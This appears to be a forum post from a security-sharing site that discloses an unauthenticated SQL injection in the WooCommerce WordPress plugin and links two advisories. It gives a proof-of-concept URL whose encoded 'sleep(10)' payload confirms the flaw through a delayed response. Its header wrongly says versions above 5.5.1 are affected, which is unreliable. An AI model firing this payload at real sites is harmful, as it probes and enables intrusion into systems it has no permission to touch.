Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

0 votes

WooCommerce plugin > 5.5.1 is vulnerable to unauthenticated SQL Injection vulnerability
Tested on version 5.5.0
Found fixed in 5.5.1

https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/
https://blog.wpsec.com/woocommerce-unauthenticated-sql-injection-vulnerability-2/

POC:

Navigate to this URL
http://REDACTEDSITE/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=test%252522%252529%252520or%252520sleep%25252810%252529%252523

The sleep function will execute and the page response will be delayed for 10 seconds.

by (234 points)

Please log in or register to answer this question.

...